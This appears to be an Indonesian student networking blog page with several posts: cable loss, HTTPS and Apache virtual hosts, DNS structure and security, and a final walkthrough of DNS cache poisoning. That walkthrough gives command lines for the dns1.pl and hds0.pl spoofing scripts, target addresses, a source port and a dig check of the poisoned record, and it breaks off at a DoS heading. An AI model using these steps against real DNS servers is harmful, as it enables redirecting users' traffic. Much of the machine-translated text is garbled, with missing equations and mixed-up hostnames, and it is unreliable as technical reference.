mayland's blog

Nama : Mayland
Kelas : 3 TKJ A
Pra KBM : INSTALASI WAN

Definisi kabel Loss

Dalam kabel koaksial khas (Gambar 2), ada dua komponen utama kabel kerugian:-efek rugi kulit dan kerugian dielektrik.











Skin- effect loss

Pada frekuensi tinggi, sinyal cenderung merambat sepanjang permukaan konduktor dalam (ditunjukkan dalam Gambar 2). Ini dikenal sebagai efek kehilangan kulit. Kedalaman kulit (δ) didefinisikan sebagai:


di mana ω adalah frekuensi dalam rad / s, μ adalah permeabilitas magnet konduktor di H / m, dan ρ adalah dirigen resistensi di ohmmeters. Efeknya menyebabkan hambatan per satuan panjang, R l, dan induktansi per satuan panjang, L l, untuk meningkatkan dengan akar kuadrat dari frekuensi. Perlawanan per satuan panjang dihitung sebagai:




dimana w adalah lebar konduktor. Untuk kawat lingkaran jari-jari r, lebarnya adalah 2 π r. Perlawanan kembali jalur juga perlu ditambahkan, tapi biasanya jauh lebih sedikit maka jalan ke depan dan dapat diabaikan.

Dielectric Loss

Dielektrik isolator, ditunjukkan dalam Gambar 2, juga memberikan kontribusi untuk kerugian kabel frekuensi-dependen. Konstanta dielektrik (ε) didefinisikan sebagai:

Persamaan 3

Dimana ε adalah komponen nyata dari konstanta dielektrik, dan tanδ merupakan khayalan, atau kerugian tangen, disipasi faktor dari dielektrik. Karena isolator dielektrik mempengaruhi kapasitansi, kapasitansi per satuan panjang (C l) perubahan l C (1 + jtanδ).

Total Cable Loss

Termasuk kulit-efek dan kerugian dielektrik, kabel ideal per satuan model panjang dapat diubah untuk memasukkan kerugian ini, seperti yang ditunjukkan pada Gambar 3.


Gambar 3. model kabel sederhana .

Dari Gambar 3, kita mendefinisikan konstanta propagasi sebagai jk = √ ZK, di mana Z adalah seri didistribusikan impendasi, dan Y adalah terdistribusi paralel penerimaan. Dalam hal ini:



Dengan menggunakan pendekatan ekspansi Taylor dan menyederhanakan lebih lanjut, istilah berikut dapat diekstraksi:



Di mana Z O's karakteristik impedansi baris, ε r adalah konstanta dielektrik relatif, dan c adalah kecepatan cahaya.

Akhirnya, apa kita benar-benar setelah adalah keuntungan kabel, H (f) = e-jk l, di mana l adalah panjang garis. Menggunakan temuan dari atas, kita sampai pada:



Dimana:



dan



Kesimpulan sederhana bahwa kita ingin melihat dari perhitungan di atas adalah:
  1. kerugian efek Kulit (α 1) mendominasi pada frekuensi rendah (Gambar 4)
  2. rugi Dielektrik (α 2) mendominasi pada frekuensi tinggi (Gambar 4)
Dalam kabel nyata, H (f) bervariasi dari pendekatan di atas. Namun, cukup akurat untuk sebagian besar ATE bekerja, dimana redaman meningkat oleh 6dB paling banyak.


Gambar 4. Representasi kulit-efek (konduktor batin), dielektrik, dan return-path (konduktor luar) kerugian.

Gambar 4 memberikan sebuah representasi dasar kerugian untuk kabel koaksial tipikal ditunjukkan dalam Gambar 2, yang memiliki karakteristik impedansi 50Ω, sebuah konduktor tembaga batin, dan konduktor luar yang terbuat dari baja dijalin. Setiap kabel memiliki kerugian sendiri yang unik, tapi masih akan menunjukkan trend yang sama terlihat pada Gambar 4.


Kesimpulan dari kabel Loss

Bukan maksud aplikasi catatan ini menawarkan pendekatan matematis yang ketat terhadap derivasi dari kabel kerugian-ini dapat diperoleh dari berbagai sumber skolastik. Namun, apa yang ditunjukkan dalam persamaan yang diringkas dalam Gambar 4. Dari analisis di atas kita mendapatkan hal-hal penting berikut:
  1. Semua kabel memiliki kerugian, dan kerugian ini akhirnya akan membatasi kinerja sistem. Jumlah kerugian tergantung pada kualitas kabel dan spesifikasinya.
  2. Kerugian yang terjadi adalah:
    a. Kulit-efek kerugian yang mendominasi pada frekuensi rendah
    b. Dielektrik kerugian yang mendominasi pada frekuensi tinggi
    c. Kembali-jalan kerugian yang tidak signifikan dan dapat diabaikan untuk kebanyakan kasus
    d. Kerugian melalui konektor, relay, dan koneksi lain yang dibuat pada node-node output atau DUT
Cable Loss VS Cable Cost

Gambar 5 menunjukkan hilangnya kabel untuk kabel yang khas, sedangkan Tabel 1 membandingkan biaya dari beberapa kabel relatif terhadap kerugian mereka.


Gambar 5. Kabel kerugian untuk berbagai kabel.

Tabel 1.Biaya per Foot khas untuk Berbagai Kabel Coaxial Fleksibel dari Satu Dipilih












Kinerja Kabel Loss

Untuk penguji yang berjalan dalam kisaran 200Mbps, kehilangan kabel tidak mungkin merupakan masalah besar. Namun, untuk penguji berjalan pada 500Mbps dan lebih tinggi, kinerja jalur sinyal penuh, elektronik, kabel, dan pin harus dianalisa sangat hati-hati untuk memastikan bahwa kinerja penuh diukur dengan benar pada pin. Spesifikasi kinerja berikut sangat penting untuk tester kecepatan tinggi:
  1. DC akurasi tingkat bentuk gelombang
  2. Naik dan turun kali
  3. Maksimum tingkat beralih
  4. Minimum pulsa-lebar kemampuan
  5. Propagasi akurasi dan cocok relatif terhadap setiap tepi
  6. Propagasi, seperti propagasi vs lebar pulsa minimum, amplitudo, dan umum modus
Semua karakteristik tersebut adalah kinerja dipengaruhi oleh pemilihan kabel. Sebagai tarif beralih meningkat, kerugian kabel mulai mendominasi dan membatasi kinerja tester, terlepas dari bandwidth pengemudi untuk mengemudi kabel. Plot pada Gambar 6 dan 7 mewakili dan menyoroti masalah ini



Gambar 6. Langkah respon pendek / kabel berkualitas tinggi.


Gambar 7. Langkah respon lagi kabel berkualitas rendah /.

Angka 6 dan 7 menggambarkan bentuk gelombang yang paling insinyur telah melihat dan tahu tentang. Namun, berikut ini adalah penting:
  1. t0 merupakan 50% dari amplitudo gelombang itu. Sebagai aturan praktis, 10% sampai 90% rise time adalah sekitar 28,6 x t0. Kedua bentuk gelombang menunjukkan penurunan yang signifikan dalam meningkat dua kali panjang kabel.
  2. Membatasi bandwidth-kurva dampak tingkat beralih maksimum, lebar pulsa minimum, dan bandwidth. Jadi, degradasi dalam jalur sinyal jelas dari plot ini.
  3. Degradasi sinyal tidak ada hubungannya dengan sopir yang sebenarnya. Dalam hal ini, kita makan respon langkah bandwidth tak terbatas, dan merupakan kabel yang menciptakan slowdowns di kali naik.
  4. Untuk kecepatan yang lebih tinggi dan kabel lagi, masalah ini semakin parah.
  5. Semua kabel, tidak peduli apa yang panjang atau kualitas, menampilkan karakteristik pada Gambar 6 dan 7 sampai tingkat tertentu.
  6. Hal ini penting untuk mencari solusi untuk kerugian kabel sehingga memungkinkan bandwidth penuh pengemudi, jika kenaikan biaya untuk kabel yang berkualitas lebih tinggi menambahkan sedikit atau tidak ada nilai ke aplikasi.
  7. Merancang kabel kompensasi ke elektronik memecahkan masalah kabel kerugian tersebut

Kesimpulan

Kabel yang digunakan dalam alat uji kecepatan tinggi dapat berdampak pada kinerja secara keseluruhan tester dan pada akhirnya akan membatasi kinerjanya. Karena biaya tinggi yang bisa dihubungkan dengan kabel, kabel murah, yang memiliki kerugian yang tinggi, biasanya digunakan dalam sistem-sistem berkecepatan tinggi. Sebagai pendekatan penguji kecepatan 1Gbps ini dan lebih tinggi, Anda tidak dapat lagi mengabaikan kerugian. Mengganti driver dengan driver bandwidth yang lebih tinggi tidak kompensasi atas kerugian yang diakibatkan oleh kabel, dan karena itu kabel akan membatasi kinerja sistem.

Hal ini diperlukan untuk mencari solusi untuk ini kerugian kabel untuk membolehkan penguji dengan bandwidth lebih besar dari 1Gbps untuk tampil di potensi penuh mereka. Untungnya, ada solusi, dan yang merancang kompensasi kabel ke elektronik.



referensi : http://www.maxim-ic.com/app-notes/index.mvp/id/4303

Read More …

HTTPS

HTTPS adalah versi aman dari HTTP,protokol komunikasi dari World Wide Web. Ditemukan oleh Netscape Communications Corporation untuk menyediakan autentikasi dan komunikasi tersandi dan penggunaan dalam komersi elektris. Selain menggunakan komunikasi plain text, HTTPS menyandikan data sesi menggunakan protokol SSL (Secure Socket Layer) atau protokol TLS (Transport Layer Security). Kedua protokol tersebut memberikan perlindungan yang memadai dari serangan eavesdroppers, dan man in the middle attacks. Pada umumnya port HTTPS adalah 443.

Virtual Host

Virtual Host atau juga dikenal sebagai shared hosting memiliki pengertian bahwa sebuah server melayani lebih dari 1 (satu) domain. Dengan adanya teknologi virtual hosting ini, siapa saja yang ingin memiliki situs web atau layanan internet lainnya (mail, file storage, multimedia, dll) tidak perlu membangun server sendiri; yang tentu saja membangun server sendiri memakan lebih banyak biaya diantaranya: biaya perangkat keras & lunak (hardware & software), koneksi internet khusus, dan juga staf khusus.

Konfigursi virtual host

Langkah – langkah yang di gunakan :

1. edit file pada file forward di /etc/bind/db.[namafile] misalnya db.example.com. dengan perintah :

#nano /etc/bind/example.com

2. kemudian setelah itu edit file tersebut misalnya menambah host dengan nama coba. Seperti berikut [paling bawah]









3. setelah itu, restart dengan perintah

#/etc/ini.d/bind9 restart

4. buat directory baru di /var/www dengan cara :

#mkdir /var/www/nama_directory

#mkdir /var/www/coba

5. kemudian copy file yang berada di /etc/apache2/sites-available/default ke file /etc/apache2/sites-available/coba dengan perintah :

#cp /etc/apache2/sites-available/default /etc/apache2/sites-available/coba

6. kemudian edit file tersebut dengan perintah :

#nano /etc/apache2/sites-available/coba

7. setelah muncul edit seperti berikut :















8. setelah keterangan tersebut di save, maka kita dapat mengubah isi halaman virtual host dengan cara:

#nano /index.html

9. untuk mengaktifkan virtual host yang telah dibuat, maka dapat dilakukan dengan cara :

#a2ensite coba

10. kemudian restart apache dengan cara :

#/etc/init.d/apache2 restart

11. hal yang terakhir yang dilakukan untuk memastikan bahwa virtual host yang dibuat dapat berfungsi dengan baik. Maka lakukan edit file host dengn perintah :

#nano /etc/host

12. Tambahkan baris berikut : 127.0.0.1 coba.example.com

13. kemudian simpan hasil konfigurasi tersebut.

14. Lakukan pengujian dengan cara mengetik coba.example.com pada addressbar.
Read More …

  1. DEFINISI DNS

Sebelum Domain Name System (DNS), jaringan komputer menggunakan HOSTS files yang berisi informasi nama komputer dan alamat IPnya. File ini dikelola terpusat dan ditiap lokasi harus dibuat copy versi terbaru dari HOSTS files. Dengan penambahan 1 komputer di jaringan, maka kita harus copy versi terbaru ke setiap lokasi. Dengan peningkatan jaringan internet, hal ini makin merepotkan. Oleh karena itu DNS merupakan solusi untuk menggantikan fungsi HOSTS files.

DNS merupakan sistem database yang terdistribusi yang digunakan untuk pencarian nama komputer di jaringan yang menggunakan TCP/IP. DNS mempunyai kelebihan ukuran database yang tidak terbatas dan juga mempunyai performa yang baik. DNS merupakan aplikasi pelayanan di internet untuk menterjemahkan domain name ke alamat IP dan juga sebaliknya. DNS dapat dianalogikan sebagai pemakaian buku telefon dimana orang yang ingin kita hubungi, berdasarkan nama untuk menghubunginya dan menekan nomor telefon berdasarkan nomor dari buku telefon tersebut. Hal ini terjadi karena komputer bekerja berdasarkan angka, dan manusia lebih cenderung bekerja berdasarkan nama. Misalkan domain name yahoo.com mempunyai alamat IP 202.68.0.134, tentu mengingat nama komputer lebih mudah dibandingkan dengan mengingat alamat IP.


  1. STRUKTUR DNS

Domain Name Space merupakan hirarki pengelompokan domain berdasarkan nama. Domain ditentukan berdasarkan kemampuan yang ada di struktur hirarki yang disebut level yang terdiri dari :

  • Root-Level Domains : merupakan level paling atas di hirarki yang diekspresikan berdasarkan periode dan dilambangkan oleh “.”.
  • Top-Level Domains : berisi second-level domains dan hosts yaitu :
    • com : organisasi komersial, seperti IBM (ibm.com).
    • edu : institusi pendidikan, seperti U.C. Berkeley (berkeley.edu).
    • org : organisasi non profit, Electronic Frontier Foundation (eff.org).
    • o net : organisasi networking, NSFNET (nsf.net).
    • gov : organisasi pemerintah non militer, NASA (nasa.gov).
    • mil : organisasi pemerintah militer, ARMY (army.mil).
    • xx : kode negara (id:Indonesia,au:Australia)
  • Second-Level Domains : berisi host dan domain lain yang disebut subdomain. Contoh dapat dilihat pada gambar 1. Domain Wijaya, wijaya.com mempunyai komputer server1.wijaya.com dan subdomain ws.wijaya.com. Subdomain ws.wijaya.com juga mempunyai host client1.ws.wijaya.com.
  • Host Name : domain name yang digunakan dengan host name akan menciptakan fully qualified domain name (FQDN) untuk setiap kompueter. Contohnya, jika terdapat fileserver1.wijaya.com, fileserver1 adalah host name dan wijaya.com adalah domain name.

  1. SERVER NAMA dan ZONA

Program yang menyimpan informasi tentang domain name space disebut server nama (name server). Server nama biasanya mempunyai informasi yang lengkap mengenai bagian-bagian dari domain name space yang disebut zona (zone), yang biasanya diambil dari file atau dari Server nama lainnya. Server nama mempunyai otoritas (authority) untuk zona tersebut, dan Server nama juga dapat mempunyai otoritas untuk banyak zona.

Perbedaan antara sebuah zona dan sebuah domain adalah penting. Semua top-level domain, dan banyak second-level domain dibagi menjadi unit-unit yang lebih kecil.

Unit-unit tersebut disebut zona.

Gambar 2.2 Domain edu dibagi menjadi zona-zona (diambil dari

http://www.oreilly.com/catalog/dns3/chapter/ch02.html)


Pada gambar diatas domain edu dibagi menjadi zona-zona, termasuk zona berkeley.edu, zona purdue.edu, dan zona nwu.edu. Bagian atas dari domain edu, juga terdapat zona edu. Domain delegation seperti mendelegasikan tugas-tugas. Seorang manajer dapat membagi proyek besar menjadi tugas-tugas yang lebih kecil dan mendelegasikan tanggung jawab untuk tiap tugas kepada karyawan yang berbeda.


4. RESOLVERS


Resolvers merupakan client yang mengakses Server nama. Umumnya resolver melakukan :

• Query sebuah server nama.
• Menginterpretasikan respon (dapat berupa resource record atau sebuah error).
• Mengirimkan kembali informasi kepada program yang memintanya.


Dalam BIND (Berkeley Internet Name Domain), implementasi UNIX untuk sebuah server DNS, resolver hanya merupakan sebuah set library routines yang menghubungkan kedalam program seperti telnet dan ftp. Bahkan hal ini bukan merupakan proses yang terpisah dengan menggabungkan sebuah query, mengirim dan menunggu sebuah jawaban, dan untuk mengirimkan kembali query yang tidak mendapat jawaban.


5. RESOLUSI


Server nama diadaptasi dari mengambil data dari domain name space. Server nama tidak hanya memberikan data mengenai zona-zona yang diotoritasi oleh mereka, tapi juga mencari kedalam domain name space untuk mencari data yang tidak dalam otoritas mereka. Proses ini disebut resolusi nama (name resolution) atau resolusi.


6. Root Name Server


Root Name Server mengetahui tempat server-server nama untuk tiap domain toplevel. Dengan memberikan query mengenai sebuah nama domain, maka root name server dapat menyediakan nama-nama dan alamat-alamat server nama dari domain top level yang nama domainnya dicari. Dan server nama top-level dapat menyediakan list server-server nama yang berhubungan dengan domain second-level yang nama domainnya dicari. Tiap server nama yang diberikan query akan memberikan informasi cara untuk mendekati jawaban yang dicari, atau juga dapat menyediakan jawaban tersebut.

Root Name Server sangat penting dalam resolusi, maka DNS menyediakan mekanisme – seperti caching, yang akan dibahas dibawah – untuk membantu offload root name server. Tetapi dengan ketidakadaan dari informasi lain, resolusi harus dimulai dari root name server. Hal ini menyebabkan root name server sangat krusial bagi operasi DNS. Jika semua root name server internet tidak dapat dicapai dalam kisaran waktu tertentu, semua resolusi dalam internet akan gagal. Untuk menghindari hal ini, internet mempunyai tigabelas root name server yang tersebar pada jaringan. Server nama lokal akan memberikan query kepada root name server untuk alamat girigiri.gbrmpa.gov.au dan merujuk ke server nama au. Server nama lokal akan bertanya kepada server nama au pertanyaan yang sama, dan merujuk ke server nama gov.au. Server nama gov.au akan merujuk server nama lokal ke server nama gbrmpa.gov.au. Terakhir, server nama lokal akan bertanya ke server namagbrmpa.gov.au tentang alamatnya dan mendapatkan jawabannya.


7. Mapping Alamat ke Nama

Satu fungsi yang kuran dari proses resolusi adalah menjelaskan bagaimana alamat bisa di petakan kembali ke nama. Memetakan alamat ke nama dilakukan untuk menghasilkan keluaran yang dapat dibaca dan lebih cepat dimengerti. Dalam DNS, memetakan alamat ke nama tidak mudah. Data, termasuk alamat, dalam domain name
space diberi indeks. Dengan memberikan nama domain, menemukan alamat relative mudah. Tetapi untuk menemukan nama domain dari alamat memerlukan pencarian yang jeli kepada data pada diagram pohon tiap nama domain. Solusi terbaik adalah menciptakan bagian dari domain name space yang menggunakan alamat-alamat sebagai label. Dalam domain name space internet, porsi dari name space ini adalah domain in-addr.arpa.

Titik pada domain in-addr.arpa diberi label setelah representasi dotted-octet dari alamat IP. Domain in-addr.arpa dapat memiliki 256 subdomain yang berhubungan dengan tiap nilai yang munghin dalam oktet pertama dalam alamat IP. Setiap subdomain dapat mempunyai 256 subdomain lagi, berhubungan dengan nilai yang mungkin dari oktet kedua. Terakhir, pada level keempat, terdapat record sumber yang terhubung pada oktet terakhir yang akan memberikan nama domain lengkap dari host atau jaringan dari alamat IP tersebut. Perlu diperharikan bahwa saat membaca nama domain, alamat IP akan tampak mundur karena membaca dari ujung ke akarnya. Contohnya, jika alamat IP dari winnie.corp.hp.com adalah 15.16.192.152, maka subdomain dari in-addr.arpa nya adalah 152.192.16.15 yang akan memetakan kembali nama domainwinnie.corp.hp.com


8. CACHING


Proses resolusi keseluruhan terlihat sangat rumit, namun biasanya berlangsung cukup cepat. Kemampuan yang meningkatkan kecepatan ini disebut caching. Server-server nama akan meng-cache data-data untuk membantu meningkatkan kecepatan dari query. Jika sebuah resolver meng-query server nama untuk data domain nama yang diketahui oleh server nama tersebut, maka proses akan berjalan sedikit lebih cepat. Server nama dapat meng-chace jawaban yang akan meneruskan jawaban ke resolver.



Pada skala kecil, DNS adalah hal-hal yang diperlukan dalam pengoperasian internet . DNS bisa diperlukan dalam berbagai level perusahaan. Pada bahasan ini, akan dijelaskan beberapa macam security . Terbagi dalam 4 macam, yaitu :

1. Administrative security

Bagian ini menggunakan file permission, konfigurasi server, BIND konfigurasi, dan DMZ. Semua itu adalah teknik yang relative simple dan bias di aplikasikan pada DNS server yang berdiri sendiri

2. Zona transfer

Zona transfer bekerja menggunakan physical security, parameter pada BIND, atau eksternal firewall. Autentifikasi secara aman dari sumber dan tujuan dari zona transfer dapat atau tidak dapat di usahakan

3. Dynamic update

Dynamic update

4. Zona integritas

Hal – hal yang diperlukan zona data yang digunakan oleh salah satu DNS yang lain.


Karena itu, DNS sangat kritis dan penuh dengan perhitungan yang rumit dan termasuk mitos yang besar. Titik kritis dalam mendefinisikan kebijakan keamanan dan prosedur untuk memahami apa yang harus dijamin-atau tepatnya apa tingkat ancaman harus dijamin terhadap dan apa ancaman yang dapat diterima. Jawaban atas dua hal akan berbeda jika DNS adalah berjalan sebagai root-server versus berjalan sebagai-rumah sederhana di DNS yang melayani beberapa volume rendah web situs. Tidak ada aturan yang keras dan cepat; mendefinisikan kebijakan Anda adalah masalah paranoid pencampuran dengan penilaian.

  • DNS Normal Data Flow

Sumber ancaman yang potensial dapat diihat dalam gambar d bawah ini


Tahap pertama dari setiap review keamanan adalah ancaman audit yang berlaku dan bagaimana mereka dinilai serius dalam situasi organisasi tertentu. Sebagai contoh, jika dynamicupdates tidak didukung (modus default BIND's), tidak akan ada ancaman update dinamis.


  • Klasifikasi Keamanan

Klasifikasi keamanan merupakan sarana untuk memungkinkan pemilihan solusi yang tepat dan
strategi untuk menghindari risiko tersirat. Banyak metode-metode berikut ini dijelaskan. Penomoran berikut berhubungan dengan Gambar 10-1













  • ancaman Lokal (1): ancaman Lokal biasanya yang paling sederhana untuk mencegah, dan biasanya diimplementasikan hanya dengan menjaga kebijakan administrasi sistem suara. zona Semua file dan file konfigurasi lainnya DNS harus memiliki tepat membaca dan menulis akses, dan harus aman didukung atau diselenggarakan dalam repositori CVS. Stealth (atau Split) server DNS dapat digunakan untuk meminimalkan akses publik, dan BIND dapat dijalankan di kotak pasir atau penjara chroot (dijelaskan di bagian "BIND dalam Chroot Penjara" kemudian dalam bab ini).
  • Server-server (2): Jika sebuah organisasi budak menjalankan DNS server, perlu untuk melaksanakan zona transfer. Seperti disebutkan sebelumnya, adalah mungkin untuk menjalankan beberapa-master server DNS, bukan dari server master-budak, dan dengan demikian menghindari masalah yang terkait. Jika zona transfer diperlukan, BIND menawarkan beberapa parameter konfigurasi yang dapat digunakan untuk minimize risiko yang melekat dalam proses. TSIG dan Transaksi KEY (TKEY) juga menawarkan aman metode untuk otentikasi meminta sumber-sumber dan tujuan. Kedua metode dijelaskan secara rinci pada bagian "Mengamankan Zona Transfer" kemudian dalam bab ini. Transfer fisik dapat diamankan dengan menggunakan Secure Socket Layer (SSL) atau Transport Layer Security (TLS).
  • Server-server (3): default BIND adalah untuk menyangkal Dynamic DNS (DDNS) dari semua sumber. Jika sebuah organisasi memerlukan fitur ini, maka BIND menyediakan sejumlah konfigurasi parameter untuk meminimalkan risiko yang terkait; ini dijelaskan secara rinci nanti dalam bab. Jaringan desain arsitektur-yaitu, semua sistem yang terlibat dalam terpercaya perimeter-lebih lanjut dapat mengurangi eksposur tersebut. TSIG dan SIG (0) dapat digunakan untuk mengamankan transaksi dari sumber eksternal. Konfigurasi Stealth (Split) server digambarkan pada Bab 4 dan 7, dan TSIG dan SIG (0) keamanan yang dijelaskan dalam bagian "Mengamankan Dynamic Update "kemudian dalam bab ini.
  • Server-klien (4): Kemungkinan keracunan cache jauh karena spoofing IP, data antar-ception, dan hacks lainnya mungkin sangat rendah dengan situs web sederhana. Namun, jika situs tersebut profil tinggi, volume tinggi, terbuka untuk ancaman kompetitif, atau merupakan penghasil pendapatan yang tinggi, maka biaya dan kompleksitas penerapan solusi DNSSEC skala penuh mungkin bernilai-sementara. Upaya yang signifikan sedang diinvestasikan oleh pengembang perangkat lunak, Registry Operator, yang RIR, dan operator root-server, antara lain banyak, ke DNSSEC. Kita cenderung melihat signifikan trickle-down efek dalam waktu dekat dalam domain publik, serta dalam kelompok dikontrol seperti intranet dan extranet. Memang, Swedia akan menjadi yang pertama negara di dunia untuk menawarkan dukungan DNSSEC untuk se domain mulai tahun 2005 akhir
  • Klien-klien (5): standar DNSSEC.bis mendefinisikan konsep keamanan sadar penyelesai-suatu saat entitas-mitos yang dapat memilih untuk menangani semua validasi keamanan langsung, dengan nama lokal server bertindak sebagai gateway komunikasi pasif.


  1. Konfigurasi defensif. Sebuah konfigurasi defensif adalah satu di mana semua, besar khususnya yang berkaitan dengan keamanan, fitur eksplisit diidentifikasi sebagai diaktifkan atau dinonaktifkan. Konfigurasi seperti mengabaikan semua pengaturan default dan nilai-nilai. Dibutuhkan sebagai titik awal situs kebutuhan, dan setiap mendefinisikan kebutuhan, positif atau negatif, dengan menggunakan laporan konfigurasi yang sesuai atau parameter lainnya. Default adalah orang malas besar bagi kami, tetapi mereka juga dapat berbahaya jika mereka berubah. Sebagai contoh, skrg sewa BIND versi Menonaktifkan DDNS secara default. Namun, banyak DNS administrator suka menambahkan pernyataan itu memungkinkan-update ("none";); secara eksplisit dalam klausul opsi global, baik sebagai jelas indikasi bahwa fitur tersebut tidak digunakan, dan sebagai perlindungan terhadap masa depan yang rilis dapat mengubah default. Sebuah file konfigurasi yang defensif mengidentifikasi semua persyaratan juga secara eksplisit mendefinisikan diri. Yaitu, dengan memeriksa file-tanpa perlu menemukan manual atau referensi dokumentasi-fungsi tersebut adalah jelas. Pada 03:00 saat pan-demonium terjadi, file diri terdefinisi tersebut dapat efek samping berguna. Deny All, Allow SelectivelyBahkan ketika operasi diperbolehkan, misalnya di NOTIFY atau zona transfer, itu mungkin bernilaiglobal menyangkal operasi dan selektif memungkinkan, seperti dalam fragmen berikut:
  • Remote Access. BIND rilis datang dengan alat administrasi yang disebut rndc (dijelaskan dalam Bab 9) yang mungkin digunakan secara lokal atau jarak jauh. Di satu sisi, rndc adalah tool yang berguna, sementara di sisi lain, jika Anda bisa masuk, sehingga dapat orang lain. BIND default adalah mengaktifkan rndc dari loopback tersebut alamat saja (127.0.0.1). Jika rndc tidak akan digunakan, harus secara eksplisit dinonaktifkan menggunakan null klausa kontrol, seperti yang ditunjukkan di sini:

// named.conf fragment
controls {};
....

Jika rndc digunakan, maka dianjurkan bahwa klausa kontrol eksplisit digunakan, bahkan jika
akses hanya diijinkan dari localhost, seperti yang ditunjukkan di sini:
// named.conf fragment
controls {
inet 127.0.0.1 allow {localhost;} keys {"rndc-key"};
};


ATTACKING DNS

  1. PENGERTIAN DASAR TEKNIK-TEKNIK


  • SERANGAN TERHADAP DNS


Server-server DNS dapat diserang dengan menggunakan beberapa teknik, yaitu :

  • Serangan buffer overflow untuk mendapakan akses perintah ke server DNSatau merubah file-file dari zona.
  • Serangan penyingkapan/penyadapan informasi seperti transfer antar zona.
  • Serangan Cache poisoning sehingga cache dari DNS dikontaminasi oleh penyerang. Hal ini dilakukan dengan menggunakan prediksi ID transaksi atau query-query recursive.


Dalam teknik cache poisoning yang akan dijabarkan dibawah ini, diasumsikan server DNS targer adalah server BIND seperti mayoritas server DNS di internet.

CACHE POISONING MENGGUNAKAN PREDIKSI

ID TRANSAKSI

Misalkan saat sebuah klien dalam domain sa.com membuat permintaan untuk

membuka www.microsoft.com, maka akan terjadi urutan peristiwa sebagai berikut :

1. Klien akan menghubungi server DNS dan meminta membuka

www.microsoft.com. Query akan berisi informasi mengenai port UDP dari

klien, alamat IP dan sebuah ID transaksi DNS.

2. Karena server DNS klien bukan merupakan authoratative untuk domain

friendster.com akan melewati query-query recursive melalui server root DNS

di internet dan menghubungi server DNS friendster dan mendapatkan jawaban

untuk querynya.

3. Query yang berhasil ini kemudian diteruskan kembali kepada klien dan

informasi ini di cache oleh kedua server nama sa.com dan klien.

Hal-hal penting yang dapat dicatat adalah :

• Dalam langkah ketiga, klien hanya dapat menerima informasi jika server DNS

menggunakan port klien yang benar dan alamat sebagai tambahan kepada ID

transaksi DNS dalam langkah pertama. Ketiga informasi ini merupakan format

pembuktian (authentication).

• Informasi dari www.microsoft.com di cache oleh kedua klien dan server untuk

periode TTL (time to live) tertentu. Jika klien lain ingin bertanya kepada

ns1.sa.com untuk membuka www.microsoft.com selama proses TTL ini maka

server nama akan mengembalikan informasi dari cache dan tidak bertanya

kepada ns1.microsoft.com.

Perbedaan kebutuhan dibuat dalam ID transaksi yang dipakai antara klien dan server

nama dan ID transaksi antar server nama. Langkah-langkah diatas dapat disalah

gunakan oleh penyerang untuk meletakkan informasi yang salah dalam cache

nsi.jugi.com. Dalam ilustrasi dibawah ini, penyerang berusaha untuk memperkirakan

ID transaksi selama proses komunikasi antar server nama. Yang dilakukan penyerang

adalah :

• Mengirimkan permintaan resolusi dalam jumlah yang besar yang masingmasing

di spoof dengan informasi IP asal yang berbeda-beda untuk

www.microsoft.com kepada ns1.sa.com.

• ns1.sa.com akan mengirim tiap permintaan tersebut kepada server DNS dan

ns1.microsoft.com. Maka server ns1.sa.com menunggu balasan yang banyak

dari ns1.microsoft.com.

• Penyerang menggunakan proses menunggu ini untuk mengirimkan ns1.sa.com

banyak balasan dari ns1.microsoft.com. Tiap balasan yang palsu tersebut

mempunyai ID transaksi yang berbeda. Penyerang berharap untuk menebak ID

transaksi yang tepat yang digunakan oleh kedua server nama tersebut.

Jika penyerang berhasil maka informasi palsu tersebut akan disimpan dalam cache

ns1.sa.com. Hal ini merupakan serangan terhadap hubungan server nama dan server

nama yang akan mengakibatkan klien yang menggunakan server nama target akan

mendapatkan informasi yang palsu. ID transaksi BIND berada dalam kisaran 1-65535.

Tiga informasi yang dibutuhkan agar query dapat diterima yaitu ID transaksi, IP

sumber dan port sumber. Dengan mengetahui alamat IP sumber maka dapat diketahui

alamat server nama yang di query. Yang sulit dicari adalah port sumber. Seringkali

BIND akan menggunakan kembali port sumber yang sama untuk query dari klien

yang sama. Maka, jika penyerang bekerja dari sebuah server nama, maka dia dapat

meminta DNS untuK melihat hostname dari servernya dari server target dan saat

paket query recursif datang, maka port sumber didapatkan.

IMPLEMENTASI CACHE POISONING

Pada bab 4 ini, akan dibahas mengenai implementasi dari serangan cache poisoning

terhadap server DNS. Pada 4.1 merupakan implementasi serangan cache poisoning

yang saya dapatkan dari studi literatur makalah Attacking the DNS Protocol –

Security Paper v2, ESA Certification, Sainstitute.org. Pada 4.2 merupakan

implementasi serangan cache poisoning yang saya lakukan dengan cara sendiri.

Implementasi serangan-serangan ini dilakukan sebagai uji coba untuk pembelajaran.

CONTOH SERANGAN SERVER DNS

Cache Poisoning Pada Server DNS

Pada uji coba serangan ini, asumsikan server nama target adalah ns1.sa.com

(12.12.12.12) dan kita menginginkan untuk “meracuni” cachenya untuk mempercayai

bahwa www.microsoft.com memiliki alamat IP 10.10.10.10 dan dengan harapan

bahwa semua query yang akan datang dalam cache-nya akan terarah ke alamat

10.10.10.10. Dengan alamat server DNS dari microsoft.com adalah

ns1.microsoft.com (13.13.13.13).

Skrip pertama dari serangan ini disebut dns1.pl1 yang secara lengkap dapat dilihat dari

http://www.sainstitute.org/articles/tools/Dns1.pl . Serangan ini harus dijalankan dari

server nama autorisasi yang dikendalikan oleh penyerang untuk meng query server

nama target untuk sebuah hostname yang di autorisasi oleh mesin penyerang. Dalam

contoh ini, skrip dijalankan dari ns1.happydays.com dan penyerang meng query

server nama target untuk www.happydays.com :

dns1.pl 12.12.12.12 www.happydays.com

source port: 54532

Dengan demikian maka kita mendapatkan port sumber. Skrip kedua yang ditulis oleh

Ramon Izaguirre disebut hds0.pl2 ( http://www.sainstitute.org/articles/tools/Hds0.pl )

yang menjalankan serangan :

./hds0.pl 13.13.13.13 12.12.12.12 54532 www.microsoft.com 10.10.10.10

(ns1.friendster.com) (ns1.sa.com) (source port) (spoof targets)

Untuk mengetahui apakah serangan berhasil, maka query server nama target :

dig @12.12.12.12 www.microsoft.com

www.microsoft.com 86400 IN A 10.10.10.10

Dalam kasus diatas, www.microsoft.com dialihkan ke 10.10.10.10, maka serangan

berhasil. Jika serangan tidak berhasil dan didapatkan alamat IP yang tepat dari

www.microsoft.com, maka kita harus menunggu durasi TTL sampai selesai dalam

cache sebelum dapat dicoba lagi. Hal ini terjadi sepertinya karena domain dari

friendster.com mempunyai lebih dari satu server DNS, bahkan mungkin juga

mempunyai sebuah server ns2.microsoft.com. Penyerang tidak mengetahui server

DNS yang mana dari domain target yang akan diquery.

Serangan DoS Pada DNS

